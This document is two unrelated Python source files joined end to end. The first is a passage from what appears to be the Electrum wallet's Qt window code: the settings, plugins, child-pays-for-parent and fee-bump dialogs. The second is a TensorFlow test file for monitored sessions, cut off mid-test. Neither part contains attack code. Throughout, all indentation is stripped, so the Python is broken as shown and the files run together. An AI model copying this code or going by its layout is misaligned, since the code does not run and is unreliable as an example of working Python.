tx_widgets.append((chooser_label, chooser_combo))
def on_unconf(x):
self.config.set_key('confirmed_only', bool(x))
conf_only = self.config.get('confirmed_only', False)
unconf_cb = QCheckBox(_('Spend only confirmed coins'))
unconf_cb.setToolTip(_('Spend only confirmed inputs.'))
unconf_cb.setChecked(conf_only)
unconf_cb.stateChanged.connect(on_unconf)
tx_widgets.append((unconf_cb, None))
def on_outrounding(x):
self.config.set_key('coin_chooser_output_rounding', bool(x))
enable_outrounding = self.config.get('coin_chooser_output_rounding', False)
outrounding_cb = QCheckBox(_('Enable output value rounding'))
outrounding_cb.setToolTip(
_('Set the value of the change output so that it has similar precision to the other outputs.') + '\n' +
_('This might improve your privacy somewhat.') + '\n' +
_('If enabled, at most 100 satoshis might be lost due to this, per transaction.'))
outrounding_cb.setChecked(enable_outrounding)
outrounding_cb.stateChanged.connect(on_outrounding)
tx_widgets.append((outrounding_cb, None))
# Fiat Currency
hist_checkbox = QCheckBox()
hist_capgains_checkbox = QCheckBox()
fiat_address_checkbox = QCheckBox()
ccy_combo = QComboBox()
ex_combo = QComboBox()
def update_currencies():
if not self.fx: return
currencies = sorted(self.fx.get_currencies(self.fx.get_history_config()))
ccy_combo.clear()
ccy_combo.addItems([_('None')] + currencies)
if self.fx.is_enabled():
ccy_combo.setCurrentIndex(ccy_combo.findText(self.fx.get_currency()))
def update_history_cb():
if not self.fx: return
hist_checkbox.setChecked(self.fx.get_history_config())
hist_checkbox.setEnabled(self.fx.is_enabled())
def update_fiat_address_cb():
if not self.fx: return
fiat_address_checkbox.setChecked(self.fx.get_fiat_address_config())
def update_history_capgains_cb():
if not self.fx: return
hist_capgains_checkbox.setChecked(self.fx.get_history_capital_gains_config())
hist_capgains_checkbox.setEnabled(hist_checkbox.isChecked())
def update_exchanges():
if not self.fx: return
b = self.fx.is_enabled()
ex_combo.setEnabled(b)
if b:
h = self.fx.get_history_config()
c = self.fx.get_currency()
exchanges = self.fx.get_exchanges_by_ccy(c, h)
else:
exchanges = self.fx.get_exchanges_by_ccy('USD', False)
ex_combo.blockSignals(True)
ex_combo.clear()
ex_combo.addItems(sorted(exchanges))
ex_combo.setCurrentIndex(ex_combo.findText(self.fx.config_exchange()))
ex_combo.blockSignals(False)
def on_currency(hh):
if not self.fx: return
b = bool(ccy_combo.currentIndex())
ccy = str(ccy_combo.currentText()) if b else None
self.fx.set_enabled(b)
if b and ccy != self.fx.ccy:
self.fx.set_currency(ccy)
update_history_cb()
update_exchanges()
self.update_fiat()
def on_exchange(idx):
exchange = str(ex_combo.currentText())
if self.fx and self.fx.is_enabled() and exchange and exchange != self.fx.exchange.name():
self.fx.set_exchange(exchange)
def on_history(checked):
if not self.fx: return
self.fx.set_history_config(checked)
update_exchanges()
self.history_model.refresh('on_history')
if self.fx.is_enabled() and checked:
self.fx.trigger_update()
update_history_capgains_cb()
def on_history_capgains(checked):
if not self.fx: return
self.fx.set_history_capital_gains_config(checked)
self.history_model.refresh('on_history_capgains')
def on_fiat_address(checked):
if not self.fx: return
self.fx.set_fiat_address_config(checked)
self.address_list.refresh_headers()
self.address_list.update()
update_currencies()
update_history_cb()
update_history_capgains_cb()
update_fiat_address_cb()
update_exchanges()
ccy_combo.currentIndexChanged.connect(on_currency)
hist_checkbox.stateChanged.connect(on_history)
hist_capgains_checkbox.stateChanged.connect(on_history_capgains)
fiat_address_checkbox.stateChanged.connect(on_fiat_address)
ex_combo.currentIndexChanged.connect(on_exchange)
fiat_widgets = []
fiat_widgets.append((QLabel(_('Fiat currency')), ccy_combo))
fiat_widgets.append((QLabel(_('Show history rates')), hist_checkbox))
fiat_widgets.append((QLabel(_('Show capital gains in history')), hist_capgains_checkbox))
fiat_widgets.append((QLabel(_('Show Fiat balance for addresses')), fiat_address_checkbox))
fiat_widgets.append((QLabel(_('Source')), ex_combo))
tabs_info = [
(fee_widgets, _('Fees')),
(tx_widgets, _('Transactions')),
(gui_widgets, _('General')),
(fiat_widgets, _('Fiat')),
(id_widgets, _('Identity')),
]
for widgets, name in tabs_info:
tab = QWidget()
grid = QGridLayout(tab)
grid.setColumnStretch(0,1)
for a,b in widgets:
i = grid.rowCount()
if b:
if a:
grid.addWidget(a, i, 0)
grid.addWidget(b, i, 1)
else:
grid.addWidget(a, i, 0, 1, 2)
tabs.addTab(tab, name)
vbox.addWidget(tabs)
vbox.addStretch(1)
vbox.addLayout(Buttons(CloseButton(d)))
d.setLayout(vbox)
# run the dialog
d.exec_()
if self.fx:
self.fx.trigger_update()
self.alias_received_signal.disconnect(set_alias_color)
run_hook('close_settings_dialog')
if self.need_restart:
self.show_warning(_('Please restart Electrum to activate the new GUI settings'), title=_('Success'))
def closeEvent(self, event):
# It seems in some rare cases this closeEvent() is called twice
if not self.cleaned_up:
self.cleaned_up = True
self.clean_up()
event.accept()
def clean_up(self):
self.wallet.thread.stop()
if self.network:
self.network.unregister_callback(self.on_network)
self.network.unregister_callback(self.on_quotes)
self.network.unregister_callback(self.on_history)
self.config.set_key("is_maximized", self.isMaximized())
if not self.isMaximized():
g = self.geometry()
self.wallet.storage.put("winpos-qt", [g.left(),g.top(),
g.width(),g.height()])
self.config.set_key("console-history", self.console.history[-50:],
True)
if self.qr_window:
self.qr_window.close()
self.close_wallet()
self.gui_object.timer.timeout.disconnect(self.timer_actions)
self.gui_object.close_window(self)
def plugins_dialog(self):
self.pluginsdialog = d = WindowModalDialog(self, _('Electrum Plugins'))
plugins = self.gui_object.plugins
vbox = QVBoxLayout(d)
# plugins
scroll = QScrollArea()
scroll.setEnabled(True)
scroll.setWidgetResizable(True)
scroll.setMinimumSize(400,250)
vbox.addWidget(scroll)
w = QWidget()
scroll.setWidget(w)
w.setMinimumHeight(plugins.count() * 35)
grid = QGridLayout()
grid.setColumnStretch(0,1)
w.setLayout(grid)
settings_widgets = {}
def enable_settings_widget(p, name, i):
widget = settings_widgets.get(name)
if not widget and p and p.requires_settings():
widget = settings_widgets[name] = p.settings_widget(d)
grid.addWidget(widget, i, 1)
if widget:
widget.setEnabled(bool(p and p.is_enabled()))
def do_toggle(cb, name, i):
p = plugins.toggle(name)
cb.setChecked(bool(p))
enable_settings_widget(p, name, i)
run_hook('init_qt', self.gui_object)
for i, descr in enumerate(plugins.descriptions.values()):
full_name = descr['__name__']
prefix, _separator, name = full_name.rpartition('.')
p = plugins.get(name)
if descr.get('registers_keystore'):
continue
try:
cb = QCheckBox(descr['fullname'])
plugin_is_loaded = p is not None
cb_enabled = (not plugin_is_loaded and plugins.is_available(name, self.wallet)
or plugin_is_loaded and p.can_user_disable())
cb.setEnabled(cb_enabled)
cb.setChecked(plugin_is_loaded and p.is_enabled())
grid.addWidget(cb, i, 0)
enable_settings_widget(p, name, i)
cb.clicked.connect(partial(do_toggle, cb, name, i))
msg = descr['description']
if descr.get('requires'):
msg += '\n\n' + _('Requires') + ':\n' + '\n'.join(map(lambda x: x[1], descr.get('requires')))
grid.addWidget(HelpButton(msg), i, 2)
except Exception:
self.logger.exception(f"cannot display plugin {name}")
grid.setRowStretch(len(plugins.descriptions.values()), 1)
vbox.addLayout(Buttons(CloseButton(d)))
d.exec_()
def cpfp(self, parent_tx, new_tx):
total_size = parent_tx.estimated_size() + new_tx.estimated_size()
parent_fee = self.wallet.get_tx_fee(parent_tx)
if parent_fee is None:
self.show_error(_("Can't CPFP: unknown fee for parent transaction."))
return
d = WindowModalDialog(self, _('Child Pays for Parent'))
vbox = QVBoxLayout(d)
msg = (
"A CPFP is a transaction that sends an unconfirmed output back to "
"yourself, with a high fee. The goal is to have miners confirm "
"the parent transaction in order to get the fee attached to the "
"child transaction.")
vbox.addWidget(WWLabel(_(msg)))
msg2 = ("The proposed fee is computed using your "
"fee/kB settings, applied to the total size of both child and "
"parent transactions. After you broadcast a CPFP transaction, "
"it is normal to see a new unconfirmed transaction in your history.")
vbox.addWidget(WWLabel(_(msg2)))
grid = QGridLayout()
grid.addWidget(QLabel(_('Total size') + ':'), 0, 0)
grid.addWidget(QLabel('%d bytes'% total_size), 0, 1)
max_fee = new_tx.output_value()
grid.addWidget(QLabel(_('Input amount') + ':'), 1, 0)
grid.addWidget(QLabel(self.format_amount(max_fee) + ' ' + self.base_unit()), 1, 1)
output_amount = QLabel('')
grid.addWidget(QLabel(_('Output amount') + ':'), 2, 0)
grid.addWidget(output_amount, 2, 1)
fee_e = BTCAmountEdit(self.get_decimal_point)
# FIXME with dyn fees, without estimates, there are all kinds of crashes here
combined_fee = QLabel('')
combined_feerate = QLabel('')
def on_fee_edit(x):
out_amt = max_fee - fee_e.get_amount()
out_amt_str = (self.format_amount(out_amt) + ' ' + self.base_unit()) if out_amt else ''
output_amount.setText(out_amt_str)
comb_fee = parent_fee + fee_e.get_amount()
comb_fee_str = (self.format_amount(comb_fee) + ' ' + self.base_unit()) if comb_fee else ''
combined_fee.setText(comb_fee_str)
comb_feerate = comb_fee / total_size * 1000
comb_feerate_str = self.format_fee_rate(comb_feerate) if comb_feerate else ''
combined_feerate.setText(comb_feerate_str)
fee_e.textChanged.connect(on_fee_edit)
def get_child_fee_from_total_feerate(fee_per_kb):
fee = fee_per_kb * total_size / 1000 - parent_fee
fee = min(max_fee, fee)
fee = max(total_size, fee) # pay at least 1 sat/byte for combined size
return fee
suggested_feerate = self.config.fee_per_kb()
if suggested_feerate is None:
self.show_error(f'''{_("Can't CPFP'")}: {_('Dynamic fee estimates not available')}''')
return
fee = get_child_fee_from_total_feerate(suggested_feerate)
fee_e.setAmount(fee)
grid.addWidget(QLabel(_('Fee for child') + ':'), 3, 0)
grid.addWidget(fee_e, 3, 1)
def on_rate(dyn, pos, fee_rate):
fee = get_child_fee_from_total_feerate(fee_rate)
fee_e.setAmount(fee)
fee_slider = FeeSlider(self, self.config, on_rate)
fee_slider.update()
grid.addWidget(fee_slider, 4, 1)
grid.addWidget(QLabel(_('Total fee') + ':'), 5, 0)
grid.addWidget(combined_fee, 5, 1)
grid.addWidget(QLabel(_('Total feerate') + ':'), 6, 0)
grid.addWidget(combined_feerate, 6, 1)
vbox.addLayout(grid)
vbox.addLayout(Buttons(CancelButton(d), OkButton(d)))
if not d.exec_():
return
fee = fee_e.get_amount()
if fee > max_fee:
self.show_error(_('Max fee exceeded'))
return
new_tx = self.wallet.cpfp(parent_tx, fee)
new_tx.set_rbf(True)
self.show_transaction(new_tx)
def bump_fee_dialog(self, tx):
fee = self.wallet.get_tx_fee(tx)
if fee is None:
self.show_error(_("Can't bump fee: unknown fee for original transaction."))
return
tx_label = self.wallet.get_label(tx.txid())
tx_size = tx.estimated_size()
d = WindowModalDialog(self, _('Bump Fee'))
vbox = QVBoxLayout(d)
vbox.addWidget(WWLabel(_("Increase your transaction's fee to improve its position in mempool.")))
vbox.addWidget(QLabel(_('Current fee') + ': %s'% self.format_amount(fee) + ' ' + self.base_unit()))
vbox.addWidget(QLabel(_('New fee' + ':')))
fee_e = BTCAmountEdit(self.get_decimal_point)
fee_e.setAmount(fee * 1.5)
vbox.addWidget(fee_e)
def on_rate(dyn, pos, fee_rate):
fee = fee_rate * tx_size / 1000
fee_e.setAmount(fee)
fee_slider = FeeSlider(self, self.config, on_rate)
vbox.addWidget(fee_slider)
cb = QCheckBox(_('Final'))
vbox.addWidget(cb)
vbox.addLayout(Buttons(CancelButton(d), OkButton(d)))
if not d.exec_():
return
is_final = cb.isChecked()
new_fee = fee_e.get_amount()
delta = new_fee - fee
if delta < 0:
self.show_error("fee too low")
return
try:
new_tx = self.wallet.bump_fee(tx, delta)
except CannotBumpFee as e:
self.show_error(str(e))
return
if is_final:
new_tx.set_rbf(False)
self.show_transaction(new_tx, tx_label)
def save_transaction_into_wallet(self, tx):
win = self.top_level_window()
try:
if not self.wallet.add_transaction(tx.txid(), tx):
win.show_error(_("Transaction could not be saved.") + "\n" +
_("It conflicts with current history."))
return False
except AddTransactionException as e:
win.show_error(e)
return False
else:
self.wallet.storage.write()
# need to update at least: history_list, utxo_list, address_list
self.need_update.set()
msg = (_("Transaction added to wallet history.") + '\n\n' +
_("Note: this is an offline transaction, if you want the network "
"to see it, you need to broadcast it."))
win.msg_box(QPixmap(icon_path("offline_tx.png")), None, _('Success'), msg)
return True
|
monitored_session_test.py | # pylint: disable=g-bad-file-header
# Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for monitored_session."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
import glob
import os
import threading
import time
from tensorflow.contrib.framework.python.ops import variables as variables_lib
from tensorflow.contrib.testing.python.framework import util_test
from tensorflow.core.protobuf import config_pb2
from tensorflow.core.protobuf import debug_pb2
from tensorflow.python.client import session as session_lib
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import errors_impl
from tensorflow.python.framework import ops
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import state_ops
from tensorflow.python.ops import variables
from tensorflow.python.platform import test
from tensorflow.python.summary import summary
from tensorflow.python.training import basic_session_run_hooks
from tensorflow.python.training import coordinator
from tensorflow.python.training import monitored_session
from tensorflow.python.training import saver as saver_lib
from tensorflow.python.training import session_run_hook
class ScaffoldTest(test.TestCase):
"""Scaffold tests."""
def test_nothing_created_before_finalize(self):
with ops.Graph().as_default():
scaffold = monitored_session.Scaffold()
self.assertEqual(None, scaffold.init_op)
self.assertEqual(None, scaffold.init_feed_dict)
self.assertEqual(None, scaffold.init_fn)
self.assertEqual(None, scaffold.ready_op)
self.assertEqual(None, scaffold.ready_for_local_init_op)
self.assertEqual(None, scaffold.local_init_op)
self.assertEqual(None, scaffold.saver)
def test_defaults_empty_graph(self):
with ops.Graph().as_default():
scaffold = monitored_session.Scaffold()
variables.Variable(1, name='my_var')
variables.Variable(
2, name='my_local_var', collections=[ops.GraphKeys.LOCAL_VARIABLES])
scaffold.finalize()
self.assertTrue(isinstance(scaffold.init_op, ops.Operation))
self.assertEqual(None, scaffold.init_feed_dict)
self.assertEqual(None, scaffold.init_fn)
self.assertTrue(isinstance(scaffold.ready_op, ops.Tensor))
self.assertTrue(isinstance(scaffold.ready_for_local_init_op, ops.Tensor))
self.assertTrue(isinstance(scaffold.local_init_op, ops.Operation))
self.assertTrue(isinstance(scaffold.saver, saver_lib.Saver))
with self.test_session() as sess:
self.assertItemsEqual([b'my_var', b'my_local_var'],
sess.run(scaffold.ready_op))
self.assertItemsEqual([b'my_var'],
sess.run(scaffold.ready_for_local_init_op))
sess.run(scaffold.init_op)
self.assertEqual(0, len(sess.run(scaffold.ready_for_local_init_op)))
sess.run(scaffold.local_init_op)
self.assertEqual(0, len(sess.run(scaffold.ready_op)))
def test_defaults_no_variables(self):
with ops.Graph().as_default():
scaffold = monitored_session.Scaffold()
constant_op.constant(1, name='my_const')
scaffold.finalize()
self.assertTrue(isinstance(scaffold.init_op, ops.Operation))
self.assertEqual(None, scaffold.init_feed_dict)
self.assertEqual(None, scaffold.init_fn)
self.assertTrue(isinstance(scaffold.ready_op, ops.Tensor))
self.assertTrue(isinstance(scaffold.ready_for_local_init_op, ops.Tensor))
self.assertTrue(isinstance(scaffold.local_init_op, ops.Operation))
self.assertTrue(isinstance(scaffold.saver, saver_lib.Saver))
def test_caches_values(self):
with ops.Graph().as_default():
variables.Variable([1])
scaffold1 = monitored_session.Scaffold()
scaffold1.finalize()
scaffold2 = monitored_session.Scaffold()
scaffold2.finalize()
self.assertEqual(scaffold1.init_op, scaffold2.init_op)
self.assertEqual(scaffold1.ready_op, scaffold2.ready_op)
self.assertEqual(scaffold1.ready_for_local_init_op,
scaffold2.ready_for_local_init_op)
self.assertEqual(scaffold1.local_init_op, scaffold2.local_init_op)
self.assertEqual(scaffold1.saver, scaffold2.saver)
def test_raise_error_if_more_than_one_cached_item(self):
with ops.Graph().as_default():
variables.Variable([1])
ops.add_to_collection(ops.GraphKeys.SAVERS, saver_lib.Saver())
ops.add_to_collection(ops.GraphKeys.SAVERS, saver_lib.Saver())
with self.assertRaisesRegexp(RuntimeError, 'More than one item'):
monitored_session.Scaffold().finalize()
def test_uses_passed_values(self):
with ops.Graph().as_default():
variables.Variable([1])
saver = saver_lib.Saver()
scaffold = monitored_session.Scaffold(
init_op=2,
init_feed_dict=3,
init_fn=lambda scaffold, sess: 4,
ready_op=5,
ready_for_local_init_op=6,
local_init_op=7,
saver=saver)
scaffold.finalize()
self.assertEqual(2, scaffold.init_op)
self.assertEqual(3, scaffold.init_feed_dict)
self.assertTrue(callable(scaffold.init_fn))
self.assertEqual(5, scaffold.ready_op)
self.assertEqual(6, scaffold.ready_for_local_init_op)
self.assertEqual(7, scaffold.local_init_op)
self.assertEqual(saver, scaffold.saver)
def test_graph_is_finalized(self):
with ops.Graph().as_default():
variables.Variable([1])
monitored_session.Scaffold().finalize()
with self.assertRaisesRegexp(RuntimeError,
'Graph is finalized and cannot be modified'):
constant_op.constant([0])
def _test_dir(temp_dir, test_name):
"""Create an empty dir to use for tests.
Args:
temp_dir: Tmp directory path.
test_name: Name of the test.
Returns:
Absolute path to the test directory.
"""
test_dir = os.path.join(temp_dir, test_name)
if os.path.isdir(test_dir):
for f in glob.glob('%s/*' % test_dir):
os.remove(f)
else:
os.makedirs(test_dir)
return test_dir
class FakeHook(session_run_hook.SessionRunHook):
def __init__(self):
self.should_stop = False
self.request = None
self.call_counter = collections.Counter()
self.last_run_context = None
self.last_run_values = None
def begin(self):
self.call_counter['begin'] += 1
def after_create_session(self, session, coord): # pylint: disable=unused-argument
self.call_counter['after_create_session'] += 1
def before_run(self, run_context):
self.call_counter['before_run'] += 1
self.last_run_context = run_context
return self.request
def after_run(self, run_context, run_values):
self.call_counter['after_run'] += 1
self.last_run_values = run_values
if self.should_stop:
run_context.request_stop()
def end(self, session):
self.call_counter['end'] += 1
class MonitoredTrainingSessionTest(test.TestCase):
"""Tests MonitoredTrainingSession."""
def test_saving_restoring_checkpoint(self):
logdir = _test_dir(self.get_temp_dir(), 'test_saving_restoring_checkpoint')
with ops.Graph().as_default():
gstep = variables_lib.get_or_create_global_step()
do_step = state_ops.assign_add(gstep, 1)
with monitored_session.MonitoredTrainingSession(
is_chief=True, checkpoint_dir=logdir) as session:
self.assertEqual(0, session.run(gstep))
self.assertEqual(1, session.run(do_step))
self.assertEqual(2, session.run(do_step))
# A restart will find the checkpoint and recover automatically.
with monitored_session.MonitoredTrainingSession(
is_chief=True, checkpoint_dir=logdir) as session:
self.assertEqual(2, session.run(gstep))
def test_summaries_steps(self):
logdir = _test_dir(self.get_temp_dir(), 'test_summaries_steps')
with ops.Graph().as_default():
gstep = variables_lib.get_or_create_global_step()
new_gstep = state_ops.assign_add(gstep, 1)
summary.scalar('my_summary_tag', new_gstep * 2)
with monitored_session.MonitoredTrainingSession(
is_chief=True,
checkpoint_dir=logdir,
save_summaries_steps=100,
log_step_count_steps=10) as session:
for _ in range(101):
session.run(new_gstep)
summaries = util_test.latest_summaries(logdir)
tags = [s.summary.value[0].tag for s in summaries]
self.assertIn('my_summary_tag', tags)
self.assertIn('global_step/sec', tags)
def test_summaries_secs(self):
logdir = _test_dir(self.get_temp_dir(), 'test_summaries_secs')
with ops.Graph().as_default():
gstep = variables_lib.get_or_create_global_step()
new_gstep = state_ops.assign_add(gstep, 1)
summary.scalar('my_summary_tag', new_gstep * 2)
with monitored_session.MonitoredTrainingSession(
is_chief=True,
checkpoint_dir=logdir,
save_summaries_steps=None,
save_summaries_secs=0.1,
log_step_count_steps=10) as session:
session.run(new_gstep)
time.sleep(0.2)
for _ in range(101):
session.run(new_gstep)
summaries = util_test.latest_summaries(logdir)
tags = [s.summary.value[0].tag for s in summaries]
self.assertIn('my_summary_tag', tags)
self.assertIn('global_step/sec', tags)
def test_custom_saving(self):
logdir = _test_dir(self.get_temp_dir(), 'test_saving_restoring_checkpoint')
fake_hook = FakeHook()
with ops.Graph().as_default():
gstep = variables_lib.get_or_create_global_step()
do_step = state_ops.assign_add(gstep, 1)
with monitored_session.MonitoredTrainingSession(
is_chief=True,
checkpoint_dir=logdir,
chief_only_hooks=[fake_hook],
save_checkpoint_secs=0) as session:
self.assertEqual(0, session.run(gstep))
self.assertEqual(1, session.run(do_step))
self.assertEqual(2, session.run(do_step))
# Check whether custom hook called or not
self.assertEqual(1, fake_hook.call_counter['begin'])
# A restart will not find the checkpoint, since we didn't save.
with monitored_session.MonitoredTrainingSession(
is_chief=True, checkpoint_dir=logdir) as session:
self.assertEqual(0, session.run(gstep))
class StopAtNSession(monitored_session._WrappedSession):
"""A wrapped session that stops at the N-th call to _check_stop."""
def __init__(self, sess, n):
super(StopAtNSession, self).__init__(sess)
self._count = n
def _check_stop(self):
if self._count == 0:
return True
self._count -= 1
return False
class WrappedSessionTest(test.TestCase):
"""_WrappedSession tests."""
def test_properties(self):
with self.test_session() as sess:
constant_op.constant(0.0)
wrapped_sess = monitored_session._WrappedSession(sess)
self.assertEquals(sess.graph, wrapped_sess.graph)
self.assertEquals(sess.sess_str, wrapped_sess.sess_str)
def test_should_stop_on_close(self):
with self.test_session() as sess:
wrapped_sess = monitored_session._WrappedSession(sess)
self.assertFalse(wrapped_sess.should_stop())
wrapped_sess.close()
self.assertTrue(wrapped_sess.should_stop())
def test_should_stop_uses_check_stop(self):
with self.test_session() as sess:
wrapped_sess = StopAtNSession(sess, 3)
self.assertFalse(wrapped_sess.should_stop())
self.assertFalse(wrapped_sess.should_stop())
self.assertFalse(wrapped_sess.should_stop())
self.assertTrue(wrapped_sess.should_stop())
def test_should_stop_delegates_to_wrapped_session(self):
with self.test_session() as sess:
wrapped_sess0 = StopAtNSession(sess, 4)
wrapped_sess1 = monitored_session._WrappedSession(wrapped_sess0)
self.assertFalse(wrapped_sess1.should_stop())
self.assertFalse(wrapped_sess1.should_stop())
self.assertFalse(wrapped_sess1.should_stop())
self.assertFalse(wrapped_sess1.should_stop())
self.assertTrue(wrapped_sess1.should_stop())
def test_close_twice(self):
with self.test_session() as sess:
wrapped_sess = monitored_session._WrappedSession(sess)
wrapped_sess.close()
self.assertTrue(wrapped_sess.should_stop())
wrapped_sess.close()
self.assertTrue(wrapped_sess.should_stop())
def test_run(self):
with self.test_session() as sess:
c = constant_op.constant(0)
v = array_ops.identity(c)
self.assertEqual(42, sess.run(v, feed_dict={c: 42}))
wrapped_sess = monitored_session._WrappedSession(sess)
self.assertEqual(51, wrapped_sess.run(v, feed_dict={c: 51}))
def busy_wait_for_coord_stop(coord):
while not coord.should_stop():
time.sleep(0.001)
class CoordinatedSessionTest(test.TestCase):
"""_CoordinatedSession tests."""
def test_properties(self):
with self.test_session() as sess:
constant_op.constant(0.0)
coord = coordinator.Coordinator()
coord_sess = monitored_session._CoordinatedSession(sess, coord)
self.assertEquals(sess.graph, coord_sess.graph)
self.assertEquals(sess.sess_str, coord_sess.sess_str)
def test_run(self):
with self.test_session() as sess:
c = constant_op.constant(0)
v = array_ops.identity(c)
coord = coordinator.Coordinator()
coord_sess = monitored_session._CoordinatedSession(sess, coord)
self.assertEqual(42, coord_sess.run(v, feed_dict={c: 42}))
def test_should_stop_on_close(self):
with self.test_session() as sess:
coord = coordinator.Coordinator()
coord_sess = monitored_session._CoordinatedSession(sess, coord)
self.assertFalse(coord_sess.should_stop())
coord_sess.close()
self.assertTrue(coord_sess.should_stop())
def test_should_stop_on_coord_stop(self):
with self.test_session() as sess:
coord = coordinator.Coordinator()
coord_sess = monitored_session._CoordinatedSession(sess, coord)
self.assertFalse(coord_sess.should_stop())
coord.request_stop()
self.assertTrue(coord_sess.should_stop())
def test_dont_request_stop_on_exception_in_main_thread(self):
with self.test_session() as sess:
c = constant_op.constant(0)
v = array_ops.identity(c)
coord = coordinator.Coordinator()
coord_sess = monitored_session._CoordinatedSession(sess, coord)
self.assertFalse(coord_sess.should_stop())
self.assertEqual(0, coord_sess.run(c))
self.assertEqual(1, coord_sess.run(v, feed_dict={c: 1}))
with self.assertRaisesRegexp(TypeError, 'None has invalid type'):
coord_sess.run([None], feed_dict={c: 2})
self.assertFalse(coord.should_stop())
self.assertFalse(coord_sess.should_stop())
def test_stop_threads_on_close_after_exception(self):
with self.test_session() as sess:
c = constant_op.constant(0)
v = array_ops.identity(c)
coord = coordinator.Coordinator()
threads = [
threading.Thread(
target=busy_wait_for_coord_stop, args=(coord,)) for _ in range(3)
]
for t in threads:
coord.register_thread(t)
t.start()
coord_sess = monitored_session._CoordinatedSession(sess, coord)
self.assertFalse(coord_sess.should_stop())
for t in threads:
self.assertTrue(t.is_alive())
self.assertEqual(0, coord_sess.run(c))
for t in threads:
self.assertTrue(t.is_alive())
self.assertEqual(1, coord_sess.run(v, feed_dict={c: 1}))
for t in threads:
self.assertTrue(t.is_alive())
with self.assertRaisesRegexp(TypeError, 'None has invalid type'):
coord_sess.run([None], feed_dict={c: 2})
coord_sess.close()
for t in threads:
self.assertFalse(t.is_alive())
self.assertTrue(coord.should_stop())
self.assertTrue(coord_sess.should_stop())
def test_stop_threads_on_close(self):
with self.test_session() as sess:
coord = coordinator.Coordinator()
threads = [
threading.Thread(
target=busy_wait_for_coord_stop, args=(coord,)) for _ in range(3)
]
for t in threads:
coord.register_thread(t)
t.start()
coord_sess = monitored_session._CoordinatedSession(sess, coord)
coord_sess.close()
for t in threads:
self.assertFalse(t.is_alive())
self.assertTrue(coord.should_stop())
self.assertTrue(coord_sess.should_stop())
class AbortAtNSession(object):
"""A mock sessionthat aborts at the N-th run call."""
def __init__(self, sess, n):
self._sess = sess
self._count = n
def close(self):
pass
def run(self, *args, **kwargs):
if self._count == 0:
raise errors_impl.AbortedError('Aborted at N', None, None)
self._count -= 1
return self._sess.run(*args, **kwargs)
class RecoverableSessionTest(test.TestCase):
"""_RecoverableSession tests."""
class _SessionReturner(object):
def __init__(self, sess):
self._sess = sess
def create_session(self):
return self._sess
def test_properties(self):
with self.test_session() as sess:
constant_op.constant(0.0)
recoverable_sess = monitored_session._RecoverableSession(
self._SessionReturner(sess))
self.assertEquals(sess.graph, recoverable_sess.graph)
self.assertEquals(sess.sess_str, recoverable_sess.sess_str)
def test_run(self):
with self.test_session() as sess:
c = constant_op.constant(0)
v = array_ops.identity(c)
recoverable_sess = monitored_session._RecoverableSession(
self._SessionReturner(sess))
self.assertEqual(51, recoverable_sess.run(v, feed_dict={c: 51}))
def test_recovery(self):
with self.test_session() as sess:
class StackSessionCreator(object):
def __init__(self, sess):
self.sessions_to_use = [
AbortAtNSession(sess, x + 1) for x in range(3)
]
def create_session(self):
return self.sessions_to_use.pop(0)
c = constant_op.constant(0)
v = array_ops.identity(c)
session_creator = StackSessionCreator(sess)
# List of 3 sessions to use for recovery. The first one aborts
# after 1 run() call, the second after 2 run calls, the third
# after 3 run calls.
self.assertEqual(3, len(session_creator.sessions_to_use))
# Make the recoverable session uses these 3 sessions in sequence by
# passing a factory that pops from the session_to_use list.
recoverable_sess = monitored_session._RecoverableSession(session_creator)
self.assertEqual(
2, len(session_creator.sessions_to_use)) # One session popped.
# Using first session.
self.assertEqual(51, recoverable_sess.run(v, feed_dict={c: 51}))
self.assertEqual(
2, len(session_creator.sessions_to_use)) # Still 2 sessions available
# This will fail and recover by picking up the second session.
self.assertEqual(42, recoverable_sess.run(v, feed_dict={c: 42}))
self.assertEqual(
1, len(session_creator.sessions_to_use)) # Still 1 session available
self.assertEqual(33, recoverable_sess.run(v, feed_dict={c: 33}))
self.assertEqual(
1, len(session_creator.sessions_to_use)) # Still 1 session available
# This will fail and recover by picking up the last session.
self.assertEqual(24, recoverable_sess.run(v, feed_dict={c: 24}))
self.assertEqual(
0, len(session_creator.sessions_to_use)) # All sessions used.
self.assertEqual(11, recoverable_sess.run(v, feed_dict={c: 11}))
self.assertEqual(0, recoverable_sess.run(v, feed_dict={c: 0}))
# This will fail and throw a real error as the pop() will fail.
with self.assertRaisesRegexp(IndexError, 'pop from empty list'):
recoverable_sess.run(v, feed_dict={c: -12})
class FakeSession(monitored_session._WrappedSession):
def __init__(self, sess):
monitored_session._WrappedSession.__init__(self, sess)
self.args_called = {}
def run(self, fetches, **kwargs):
self.args_called = dict(kwargs)
# Call run only with fetches since we directly pass other arguments.
return monitored_session._WrappedSession.run(self, fetches)
class HookedSessionTest(test.TestCase):
"""Tests of _HookedSession."""
def testRunPassesAllArguments(self):
with ops.Graph().as_default(), session_lib.Session() as sess:
mock_run = FakeSession(sess)
mon_sess = monitored_session._HookedSession(sess=mock_run, hooks=[])
a_tensor = constant_op.constant([0], name='a_tensor')
sess.run(variables.global_variables_initializer())
output = mon_sess.run(fetches=a_tensor,
feed_dict='a_feed',
options='an_option',
run_metadata='a_metadata')
self.assertEqual(output, [0])
self.assertEqual(mock_run.args_called, {
'feed_dict': 'a_feed',
'options': 'an_option',
'run_metadata': 'a_metadata'
})
def testCallsHooksBeginEnd(self):
with ops.Graph().as_default(), session_lib.Session() as sess:
mock_hook = FakeHook()
mock_hook2 = FakeHook()
mon_sess = monitored_session._HookedSession(
sess=sess, hooks=[mock_hook, mock_hook2])
a_tensor = constant_op.constant([0], name='a_tensor')
sess.run(variables.global_variables_initializer())
mon_sess.run(a_tensor)
for hook in [mock_hook, mock_hook2]:
self.assertEqual(
hook.last_run_values,
session_run_hook.SessionRunValues(
results=None,
options=config_pb2.RunOptions(),
run_metadata=config_pb2.RunMetadata()))
self.assertEqual(hook.last_run_context.original_args,
session_run_hook.SessionRunArgs(a_tensor))
self.assertEqual(hook.last_run_context.session, sess)
